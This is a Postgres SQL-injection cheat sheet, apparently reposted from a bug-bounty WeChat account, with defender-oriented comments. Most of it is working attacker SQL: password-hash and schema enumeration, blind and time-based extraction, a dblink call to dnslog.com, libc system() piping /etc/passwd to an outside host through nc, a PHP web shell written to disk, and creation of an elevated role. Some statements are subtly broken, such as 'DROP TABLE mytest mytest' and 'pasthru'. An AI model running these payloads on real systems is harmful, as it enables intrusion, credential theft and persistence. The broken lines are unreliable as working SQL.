-- Postgres SQL-injection cheat sheet: an inventory of statements an attacker runs
-- once injection is possible. The annotations below are written for defenders:
-- what privilege each statement needs and what to monitor. Every statement is
-- left exactly as found.

-- Fingerprinting: server version string.
SELECT version()
-- Current-user and user-list enumeration (several equivalent forms on one line).
SELECT user;SELECT current_user;SELECT session_user;SELECT usename FROM pg_user;SELECT getpgusername();
SELECT usename FROM pg_user
-- pg_shadow exposes password hashes and is readable only by superuser; a hit
-- here means the application connects with far more privilege than it needs.
SELECT usename, passwd FROM pg_shadow
-- Role-attribute enumeration (createdb / superuser / catalog-update flags).
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
SELECT usename FROM pg_user WHERE usesuper IS TRUE
-- Database enumeration.
SELECT current_database()
SELECT datname FROM pg_database
-- Schema enumeration: every table/column pair in schema "public", via comma
-- joins over the catalogs filtered on relkind = 'r' and non-dropped attributes.
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')
-- Tables visible on the search_path, excluding pg_catalog and pg_toast.
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)
-- Tables in "public" having a column whose name contains "password"
-- (the LIKE here is case-sensitive, unlike the ILIKE on the schema name).
SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';
-- Row-at-a-time extraction with LIMIT 1 OFFSET n. In query logs this appears as
-- the same statement repeated with an incrementing OFFSET.
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0;
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
-- Expression building blocks used for blind (boolean / bitwise) inference. Many
-- near-identical requests that differ only in a substr() index or a bit mask
-- are the detection signature for this technique.
SELECT substr('abcd', 3, 1); -- returns c
SELECT 6 & 2; -- returns 2
SELECT 6 & 1; -- returns 0
SELECT chr(65);
SELECT ascii('A');
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT 'A' || 'B'; -- returns AB
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- returns A
SELECT CHR(65)||CHR(66); -- returns AB
-- Time-based inference; pg_sleep needs no special privilege, so statement
-- timeouts and slow-query alerting are the practical controls.
SELECT pg_sleep(10); -- postgres 8.2 and later
-- Hand-rolled delay by binding libc through a C-language function. CREATE
-- FUNCTION ... LANGUAGE C requires superuser; monitor pg_proc for functions whose
-- library path (probin) points outside the PostgreSQL installation.
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(10); -- self-made delay
-- Out-of-band channel through the dblink extension: the host= in the connection
-- string is attacker-chosen, so the controls are egress filtering from the
-- database host and not installing dblink where it is not needed.
SELECT * FROM dblink('host=dnslog.com user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT);
-- OS command execution by binding libc system() as a C-language function; again
-- superuser only. The payload exfiltrates over the network, so egress filtering
-- and alerting on CREATE FUNCTION ... LANGUAGE C both apply.
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
-- Server-side file read: COPY ... FROM a server file into a staging table.
-- COPY to/from a server file requires superuser or the pg_read_server_files
-- role. The lines starting with a quote are injection fragments meant to be
-- appended to an existing application query.
CREATE TABLE mydata(t text);
COPY mydata FROM '/etc/passwd';
' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1;
' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2;
-- Cleanup of the staging table (left as found).
DROP TABLE mytest mytest;
-- Server-side file write: a row is staged and written out with COPY ... TO,
-- which requires superuser or the pg_write_server_files role. The database
-- service account must have no write access to web-served directories.
CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('<? pasthru($_GET[cmd]); ?>');
COPY mytable (mycol) TO '/tmp/test.php';
SELECT inet_server_addr(); -- returns the database server's IP address (null on a local connection)
SELECT inet_server_port(); -- returns the database server's port (null on a local connection)
-- Persistence: creating a role and elevating it. CREATEUSER is an old synonym
-- for SUPERUSER (NOTE(review): removed in newer releases — confirm against the
-- target version). CREATE ROLE / ALTER ROLE statements should be audited.
CREATE USER test1 PASSWORD 'pass1';
CREATE USER test1 PASSWORD 'pass1' CREATEUSER;
ALTER USER test1 CREATEUSER CREATEDB;
-- Server configuration paths; NOTE(review): these settings are readable only by
-- superuser (or pg_read_all_settings on newer releases) — confirm.
SELECT current_setting('data_directory');
SELECT current_setting('hba_file');
-- Default template databases present in every cluster.
template0
template1
仅限交流学习使用,如您在使用本工具或代码的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。“如侵权请私聊公众号删文”。
原文始发于微信公众号(柠檬赏金猎人):Postgres SQL 注入速查表